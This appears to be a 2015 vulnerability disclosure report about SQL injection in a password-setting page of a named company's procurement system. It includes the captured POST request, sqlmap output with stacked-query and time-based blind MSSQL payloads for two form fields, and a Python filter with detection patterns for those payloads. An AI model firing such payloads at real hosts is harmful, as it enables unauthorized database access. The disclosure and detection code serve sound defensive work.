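2015-04-19: Details reported to the vendor; awaiting vendor handling
2015-04-21: Vendor has confirmed; details disclosed to the vendor only
2015-05-01: Details disclosed to core white hats and experts in related fields
2015-05-11: Details disclosed to regular white hats
2015-05-21: Details disclosed to intern white hats
2015-06-05: Details disclosed to the public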
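As the title says.
http://cg.chaoxing.com/set_password.aspx This page is disabled, but in the steps that followed, capturing the traffic made it possible to locate the injectable page.
A quick test shows that POST injection exists. The post.txt file is as follows: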
POST /set_password.aspx HTTP/1.1
Host: cg.chaoxing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://cg.chaoxing.com/set_password.aspx
Cookie: msign_dsr=1428996158882; __utma=68824131.282036900.1428999176.1428999176.1429147930.2; __utmz=68824131.1428999176.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=68824131.3.9.1429147931475; __utmc=68824131
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExNjY5MDI0MjlkZA%3D%3D&TextBox1=111%40qq.com&TextBox2=123123123123&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF
Place: POST
Parameter: TextBox1
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExNjY5MDI0MjkPZBYCAgMPZBYCAhMPDxYCHgRUZXh0BU08c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+YWxlcnQoJ+S4quS6uuS/oeaBr+S/ruaUueaIkOWKn++8gScpPC9zY3JpcHQ+IGRkZA==&[email protected]'; WAITFOR DELAY '0:0:5'--&TextBox2=123123123123&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExNjY5MDI0MjkPZBYCAgMPZBYCAhMPDxYCHgRUZXh0BU08c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+YWxlcnQoJ+S4quS6uuS/oeaBr+S/ruaUueaIkOWKn++8gScpPC9zY3JpcHQ+IGRkZA==&[email protected]' WAITFOR DELAY '0:0:5'--&TextBox2=123123123123&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF

Place: POST
Parameter: TextBox2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExNjY5MDI0MjkPZBYCAgMPZBYCAhMPDxYCHgRUZXh0BU08c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+YWxlcnQoJ+S4quS6uuS/oeaBr+S/ruaUueaIkOWKn++8gScpPC9zY3JpcHQ+IGRkZA==&[email protected]&TextBox2=123123123123'; WAITFOR DELAY '0:0:5'--&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTExNjY5MDI0MjkPZBYCAgMPZBYCAhMPDxYCHgRUZXh0BU08c2NyaXB0IHR5cGU9J3RleHQvamF2YXNjcmlwdCc+YWxlcnQoJ+S4quS6uuS/oeaBr+S/ruaUueaIkOWKn++8gScpPC9zY3JpcHQ+IGRkZA==&[email protected]&TextBox2=123123123123' WAITFOR DELAY '0:0:5'--&Button1=%E4%BF%9D%E5%AD%98%E4%BF%A1%E6%81%AF
---
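Both parameters are injectable.
Strict filtering
Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-04-21 13:29
This affects the company's procurement system. Thanks to the person who reported the vulnerability.
None yet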
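
The "strict filtering" suggested in the report, sketched as a request-body check for the two fields sqlmap flagged. This is an added example, not code from the report or the vendor. The e-mail rule for TextBox1, the marker patterns and the sample bodies are assumptions constructed from the request and payloads shown above.

```python
import re
from urllib.parse import parse_qs, urlencode

# The two form fields sqlmap reported as injectable on this page.
WATCHED_FIELDS = ("TextBox1", "TextBox2")

# Assumption: TextBox1 holds an e-mail address (the captured request sends
# 111@qq.com); the page does not state the field's real validation rule.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}\.[A-Za-z]{2,}")

# Markers of the reported techniques: the MSSQL delay statement, and a quote
# that closes the string literal right before a statement separator or comment.
SQLI_MARKERS = (
    ("time-delay", re.compile(r"waitfor\s+delay", re.IGNORECASE)),
    ("quote-break", re.compile(r"'\s*(?:;|--)")),
)


def inspect_body(body):
    """Return (field, reason) findings for one form-encoded POST body."""
    # separator="&" keeps a literal ';' inside a value instead of splitting on it.
    fields = parse_qs(body, keep_blank_values=True, separator="&")
    findings = []
    for name in WATCHED_FIELDS:
        for value in fields.get(name, []):
            for reason, pattern in SQLI_MARKERS:
                if pattern.search(value):
                    findings.append((name, reason))
            if name == "TextBox1" and not EMAIL_RE.fullmatch(value):
                findings.append((name, "not-an-email"))
    return findings


# Constructed samples: the benign body is trimmed from the captured request,
# the other two re-encode field values shown in the sqlmap output.
BENIGN = "__EVENTTARGET=&TextBox1=111%40qq.com&TextBox2=123123123123"
STACKED_TB1 = urlencode({"TextBox1": "111@qq.com'; WAITFOR DELAY '0:0:5'--",
                         "TextBox2": "123123123123"})
BLIND_TB2 = urlencode({"TextBox1": "111@qq.com",
                       "TextBox2": "123123123123' WAITFOR DELAY '0:0:5'--"})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("stacked", STACKED_TB1),
                        ("blind", BLIND_TB2)):
        print(label, inspect_body(body))
```

A marker match is a detection signal for logs or a gateway, and a legitimate password can contain a quote. The injection itself is removed by having the server bind TextBox1 and TextBox2 as query parameters instead of concatenating them into SQL.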